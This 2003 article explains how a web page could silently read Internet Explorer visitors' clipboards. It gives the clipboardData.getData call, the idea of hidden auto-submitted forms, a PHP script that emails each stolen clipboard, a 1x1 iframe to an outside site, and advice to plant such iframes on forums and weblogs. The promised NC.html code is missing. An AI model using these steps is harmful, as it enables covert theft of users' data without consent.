It began with a wonder. Why the hell should Microsoft support low-level API methods such as
Why ask website visitors to fill-in forms while at the same time you could gather much more qualified information automatically, silently, seamlessly, and best of all without user consent?
1- Retrieving the current clipboard content from someone's machineIt's basically one line of code, and it's supported by all Internet Explorer 4+ browsers.
var content = clipboardData.getData("Text");
What to do next? If we want to process to be of any use, we should at this point forward the content using a subsequent http request targetting whatever website that might be able to receive the content and process it further.
2- Forwarding the stolen content
There is an html/http object which naturally fits as a container for clipboard content. Yes, it's forms. More accurately, what's going to be used is auto-submitted hidden forms. Again, the ability to do such things is only a consequence of Microsoft's desire to make html and other form of scripting as versatile and integrated as possible. This obviously comes with some danger!
Hidden form means a standard form object with a purposed CSS attribute telling the object not to display itself on screen, while being 100% active and programmable at the same time. The ability to have a hidden form is necessary, otherwise the user would see that strange things happen when he reads web pages (such like automatically filled forms! how weird indeed).
The code to auto-fill a hidden form is given below :NC.html :
In fact, this script could be executed as a result of some event handler and could be inline with an html anchor. That's up to the implementer which place is best to fit the purpose. Again, there are various scenarios to build upon.
3- Compiling clipboard content from the audience
Below is a sample code that makes an email out of each received clipboard content.
<?php // retrieve form content $qs_topicID = $HTTP_POST_VARS["topicID"]; // retrieve user site url $qs_referer = $HTTP_REFERER; // make and send an email email ("webmaster","email@example.com", "clipboard notification",$qs_referer."\n\n".$qs_topicID); ?>
An interesting thought here is to grab as much user information available as possible. For instance, we could grab the query string as well (
4- Making the whole technique seamless
Ok, now the clipboard content is stolen and forwarded to a target and arbitrary web page. At this point, it's up to the target page to provide the scripting code to retrieve the posted form content and do whatever they will with it, including making an email and forwarding it to $interested$ parties.
Here is the html snippet to achieve this, just put it anywhere else in your web page (for instance just below the body tag) :
<iframe width=1 height=1 src="http://www.somesite.com/NC.html"></iframe>
NC.html is the html code detailed in section 2.
5- Bringing contagion
So far, the clipboard content theft has been limited to explicit webmaster will to have such code plugged in web pages users are visiting. This has to be explicit. As such, this has narrow effects. But there's more to it, why not take advantage of boards, weblogs, and whatever web spaces where one can submit text/html content to insert an iframe and, as a consequence, be greeted with clipboard contents of whatever visitor that reads that web page? Easy. May be not so funny, but easy.Enjoy!
Stephane Rodriguez- July 12, 2003.